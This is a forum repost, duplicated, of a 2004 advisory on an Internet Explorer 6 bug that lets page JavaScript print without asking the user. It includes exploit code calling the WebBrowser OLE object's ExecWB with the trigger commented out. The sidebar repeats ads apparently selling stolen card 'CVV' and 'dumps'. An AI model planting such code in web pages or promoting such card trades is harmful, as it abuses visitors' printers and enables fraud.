Log in
Latest topics
Top posting users this week
| No user |
Nimbuzz id Maker
Internet Explorer 6 Print Without Prompt Bug
Page 1 of 1
Internet Explorer 6 Print Without Prompt Bug
storm Thu Sep 12, 2013 10:35 am
Internet Explorer 6 Print Without Prompt Bug
Application: Microsoft Internet Explorer
Versions: 6.0
Platforms: Windows
Bugs: IE 6 allows JavaScript to send documents to the printer without prompting the user.
Exploitation: Client
Date: 12 April 2004
Author: Ben Garvey
bengarvey_at_comcast.net
http://www.bengarvey.com
Bugtraq report format: Thanks Luigi Auriemma!
########################################################
===============
1) Introduction
===============
Microsoft Internet Explorer is the dominant web browser on the world's PCs.
Any exploits or bugs found hurt millions of users.
Like anyone here needed to know that or is surprised.
########################################################
===============
2) Bug summary
===============
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. Printing documents without prompting the user could result in the waste of paper, toner, ink or result in damage to the printer. If inserted into a high traffic website this waste could be substantial. $ of paper x printed sheets x web traffic x % of IE Users = $total waste in paper If paper costs a penny per sheet ($5 for 500 sheets) We average about 10 sheets printed per user before they realize what's happening (conservative estimate) It's used on a high traffic website (1 million unique visitors) IE's market share is about 90%. $0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages This doesn't even include costs associated with toner and time.
===============
3) Exploit
===============
The following is an example of the exploit. The offending line must be uncommented to activate it. Remove any linebreaks that break the JavaScript.
function ieExecWB( intOLEcmd, intOLEparam )
{ // Create OLE Object
var WebBrowser = 'CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2">
';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || (
intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
===============
4) Conclusion
===============
I can't think of any reasonable use for allowing IE to print stuff
without my permission.This bug should be fixed as soon as possible.
Application: Microsoft Internet Explorer
Versions: 6.0
Platforms: Windows
Bugs: IE 6 allows JavaScript to send documents to the printer without prompting the user.
Exploitation: Client
Date: 12 April 2004
Author: Ben Garvey
bengarvey_at_comcast.net
http://www.bengarvey.com
Bugtraq report format: Thanks Luigi Auriemma!
########################################################
===============
1) Introduction
===============
Microsoft Internet Explorer is the dominant web browser on the world's PCs.
Any exploits or bugs found hurt millions of users.
Like anyone here needed to know that or is surprised.
########################################################
===============
2) Bug summary
===============
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. Printing documents without prompting the user could result in the waste of paper, toner, ink or result in damage to the printer. If inserted into a high traffic website this waste could be substantial. $ of paper x printed sheets x web traffic x % of IE Users = $total waste in paper If paper costs a penny per sheet ($5 for 500 sheets) We average about 10 sheets printed per user before they realize what's happening (conservative estimate) It's used on a high traffic website (1 million unique visitors) IE's market share is about 90%. $0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages This doesn't even include costs associated with toner and time.
===============
3) Exploit
===============
The following is an example of the exploit. The offending line must be uncommented to activate it. Remove any linebreaks that break the JavaScript.
function ieExecWB( intOLEcmd, intOLEparam )
{ // Create OLE Object
var WebBrowser = 'CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2">
';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || (
intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
I like your PRINTER
===============
4) Conclusion
===============
I can't think of any reasonable use for allowing IE to print stuff
without my permission.This bug should be fixed as soon as possible.
storm- Member
- Posts : 155
Points : 458
Reputation : 1
Join date : 2012-12-05
Similar topics» Internet Information Server 6.0 Denial Of Service
» print your page
» How to print a page in HTML pages
» How to acess internet without any browser
» New internet download manager 6.12 22 build with crack
» print your page
» How to print a page in HTML pages
» How to acess internet without any browser
» New internet download manager 6.12 22 build with crack
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
» Mobile Server Available 24/7 Online Service Feel Free For Use
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU